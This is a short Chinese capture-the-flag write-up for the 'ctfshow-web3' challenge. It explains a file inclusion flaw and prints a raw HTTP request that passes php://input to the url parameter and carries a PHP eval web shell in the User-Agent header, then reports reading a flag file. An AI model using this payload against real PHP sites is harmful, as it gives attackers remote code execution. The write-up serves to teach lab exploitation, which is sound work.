ctfshow-web3

0x00 前言

  • CTF 加解密合集
  • CTF Web合集

0x01 题目

ctfshow-web3_第1张图片

0x02 Write Up

这个题目一看就知道是一个文件包含漏洞

php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。

GET http://3afc5257-7b7d-4917-a1eb-5ea59fc35d8c.challenge.ctf.show/?url=php://input HTTP/1.1
Host: 3afc5257-7b7d-4917-a1eb-5ea59fc35d8c.challenge.ctf.show
Upgrade-Insecure-Requests: 1
User-Agent: <?php @eval($_POST["s"])?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Connection: close
Content-Length: 20


所以就可以直接执行命令

ctfshow-web3_第2张图片
发现一个ctf_go_go_go的文件,然后读取就是了

ctfshow-web3_第3张图片

以上

你可能感兴趣的:(web,CTF,python,web安全)